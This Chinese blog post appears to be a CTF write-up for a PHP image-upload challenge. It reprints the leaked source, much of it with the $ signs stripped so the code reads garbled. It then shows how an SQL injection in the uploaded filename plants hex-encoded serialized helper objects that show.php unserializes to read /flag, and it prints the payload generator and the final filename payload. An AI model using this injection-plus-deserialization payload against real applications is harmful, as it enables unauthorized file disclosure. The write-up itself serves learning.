比赛时候这个题没有怼出来 因为对INSERT INTO语句不是很熟,看代码时候漏掉了那一部分,没想到可以用sql注入把序列化数据写进去,正好今天晚上没课,复现一下。

题目一共三个功能点,上传,查看文件和删除文件。
最开始测了一下感觉没啥思路,该过滤的都过滤了,如果是文件操作触发phar反序列化应该给源码才对,陷入困境.jpg
后来题目提示源码泄露,在github上搜到了源码

<!DOCTYPE html>
<html>
<head>
    <title>Image Upload</title>
    <link rel="stylesheet" href="./style.css">
    <meta http-equiv="content-type" content="text/html;charset=UTF-8"/>
</head>
<body>
<p align="center"><img src="https://i.loli.net/2019/10/06/i5GVSYnB1mZRaFj.png" width=300 length=150></p>
<div align="center">
<form name="upload" action=""  method="post" enctype ="multipart/form-data" >
    <input type="file" name="file">
    <input type="Submit" value="submit">
</form>
</div>

<br> 
<p><a href="./show.php">You can view the pictures you uploaded here</a></p>
<br>

<?php
include("./helper.php");
class upload extends helper {
    public function upload_base(){
        this->upload();
    }
}

if (_FILES){
    if (_FILES["file"]["error"]){
        die("Upload file failed.");
    }else{file = new upload();
        file->upload_base();
    }
}a = new helper();
?>
</body>
</html>
<?php//helper.php
class helper {
    protected folder = "pic/";
    protectedifview = False; 
    protected config = "config.txt";
    // The function is not yet perfect, it is not open yet.

    public function upload(input="file")
    {
        fileinfo =this->getfile(input);array = array();
        array["title"] =fileinfo['title'];
        array["filename"] =fileinfo['filename'];
        array["ext"] =fileinfo['ext'];
        array["path"] =fileinfo['path'];
        img_ext = getimagesize(_FILES[input]["tmp_name"]);my_ext = array("width"=>img_ext[0],"height"=>img_ext[1]);
        array["attr"] = serialize(my_ext);
        id =this->save(array);
        if (id == 0){
            die("Something wrong!");
        }
        echo "<br>";
        echo "<p>Your images is uploaded successfully. And your image's id is id.</p>";
    }

    public function getfile(input)
    {
        if(isset(input)){rs = this->check(_FILES[input]);
        }
        returnrs;
    }

    public function check(info)
    {basename = substr(md5(time().uniqid()),9,16);
        filename =info["name"];
        ext = substr(strrchr(filename, '.'), 1);
        cate_exts = array("jpg","gif","png","jpeg");
        if(!in_array(ext,cate_exts)){
            die("<p>Please upload the correct image file!!!</p>");
        }title = str_replace(".".ext,'',filename);
        return array('title'=>title,'filename'=>basename.".".ext,'ext'=>ext,'path'=>this->folder.basename.".".ext);
    }

    public function save(data)
    {
        if(!data || !is_array(data)){
            die("Something wrong!");
        }
        id =this->insert_array(data);
        returnid;
    }

    public function insert_array(data)
    {con = mysqli_connect("127.0.0.1","root","root","pic_base");
        if (mysqli_connect_errno(con))        {            die("Connect MySQL Fail:".mysqli_connect_error());
        }sql_fields = array();
        sql_val = array();
        foreach(data as key=>value){
            key_temp = str_replace(chr(0).'*'.chr(0), '\0\0\0',key);
            value_temp = str_replace(chr(0).'*'.chr(0), '\0\0\0',value);
            sql_fields[] = "`".key_temp."`";
            sql_val[] = "'".value_temp."'";
        }
        sql = "INSERT INTO images (".(implode(",",sql_fields)).") VALUES(".(implode(",",sql_val)).")";
        mysqli_query(con, sql);id = mysqli_insert_id(con);
        mysqli_close(con);
        return id;
    }

    public function view_files(path){
        if (this->ifview == False){
            return False;
            //The function is not yet perfect, it is not open yet.
        }content = file_get_contents(path);
        echocontent;
    }

    function __destruct(){
        # Read some config html
        this->view_files(this->config);
    }
}

?>
<!DOCTYPE html>//show.php
<html>
<head>
    <title>Show Images</title>
    <link rel="stylesheet" href="./style.css">
    <meta http-equiv="content-type" content="text/html;charset=UTF-8"/>
</head>
<body>

<h2 align="center">Your images</h2>
<p>The function of viewing the image has not been completed, and currently only the contents of your image name can be saved. I hope you can forgive me and my colleagues and I are working hard to improve.</p>
<hr>

<?php
include("./helper.php");
show = new show();
if(_GET["delete_all"]){
    if(_GET["delete_all"] == "true"){show->Delete_All_Images();
    }
}
show->Get_All_Images();

class show{
    publiccon;

    public function __construct(){
        this->con = mysqli_connect("127.0.0.1","root","root","pic_base");
        if (mysqli_connect_errno(this->con)){ 
            die("Connect MySQL Fail:".mysqli_connect_error());
        }
    }

    public function Get_All_Images(){
        sql = "SELECT * FROM images";result = mysqli_query(this->con,sql);
        if (result->num_rows>0){
            while(row = result->fetch_assoc()){
                if(row["attr"]){
                    attr_temp = str_replace('\0\0\0', chr(0).'*'.chr(0),row["attr"]);
                    attr = unserialize(attr_temp);
                }
                echo "<p>id=".row["id"]." filename=".row["filename"]." path=".row["path"]."</p>";
            }
        }else{
            echo "<p>You have not uploaded an image yet.</p>";
        }
        mysqli_close(this->con);
    }

    public function Delete_All_Images(){
        sql = "DELETE FROM images";result = mysqli_query(this->con,sql);
    }
}
?>

<p><a href="show.php?delete_all=true">Delete All Images</a></p>
<p><a href="upload.php">Upload Images</a></p>

</body>
</html>

可以看到核心的类是helper 删除图片的操作用的数据库,不涉及phar反序列化的触发。

在upload方法中,调用getfile()方法,对文件后缀进行了一次check,采用白名单 不太可能绕过,往下看。

把原本在fileinfo数组中的数据存到array数组中,不太知道这段代码有啥意义…

然后把序列化的宽高数据存入了ext中 我做题时候本来以为是要欺骗getimagesize函数把序列化数据写进宽高里然后再反序列化

Orz跑了个大偏

真正的漏洞触发点在被save方法调用的insert_array方法中

public function insert_array(data)
    {con = mysqli_connect("127.0.0.1","root","root","pic_base");
        if (mysqli_connect_errno(con))        {            die("Connect MySQL Fail:".mysqli_connect_error());
        }sql_fields = array();
        sql_val = array();
        foreach(data as key=>value){
            key_temp = str_replace(chr(0).'*'.chr(0), '\0\0\0',key);
            value_temp = str_replace(chr(0).'*'.chr(0), '\0\0\0',value);
            sql_fields[] = "`".key_temp."`";
            sql_val[] = "'".value_temp."'";
        }
        sql = "INSERT INTO images (".(implode(",",sql_fields)).") VALUES(".(implode(",",sql_val)).")";
        mysqli_query(con, sql);id = mysqli_insert_id(con);
        mysqli_close(con);
        return $id;
    }

foreach那里不太确定是不是在两个数组里分别插入键和值,自己本地试了下。

顺便总结了一个新写法
数组[]=内容
可以直接把内容压到数组里

然后往下看
$sql = "INSERT INTO images (".(implode(",",$sql_fields)).") VALUES(".(implode(",",$sql_val)).")";
注入点就是这里 把键值对插入到数据里,造成了注入
也就是如果能用注入控制前面被序列化的$attr的话,就能构造出pop链读取flag

由于文件名不能有特殊符号,序列化数据要进行hex编码

拿自己构造的payload失败了
持续自闭

然后突然想起来自己之前做newbugku时候有一道题要传入base64加密之后的private属性序列化数据,那道题里自己加%00再base64加密是不行的,必须用php原生数据加密。
这道题会不会也是

<?php 
class helper {
    protected ifview = False;    protectedconfig = "config.txt";
    // The function is not yet perfect, it is not open yet.
    public function __construct(ifview,config){
        this->ifview=ifview;
        this->config=config;
    }
}
a=new helper(True,"/flag");
echo bin2hex(serialize(a));
?>

试了一下果然出来了。。
"a’,’3′,’1′,’1′,0x4f3a363a2268656c706572223a323a7b733a393a22002a00696676696577223b623a313b733a393a22002a00636f6e666967223b733a353a222f666c6167223b7d)#.jpg"

踩坑了踩坑了 下次长记性

还有一点就是传参时用来闭合语句的引号必须要单引号 可代码里明明用的是双引号 测了一下发
现implode分割字符时候其实用的单引号

整个语句其实是这样拼起来的,见过这么多次 第一次仔细想这个语句的组成

Categories: 技术

0 Comments

发表评论

Avatar placeholder

您的电子邮箱地址不会被公开。 必填项已用*标注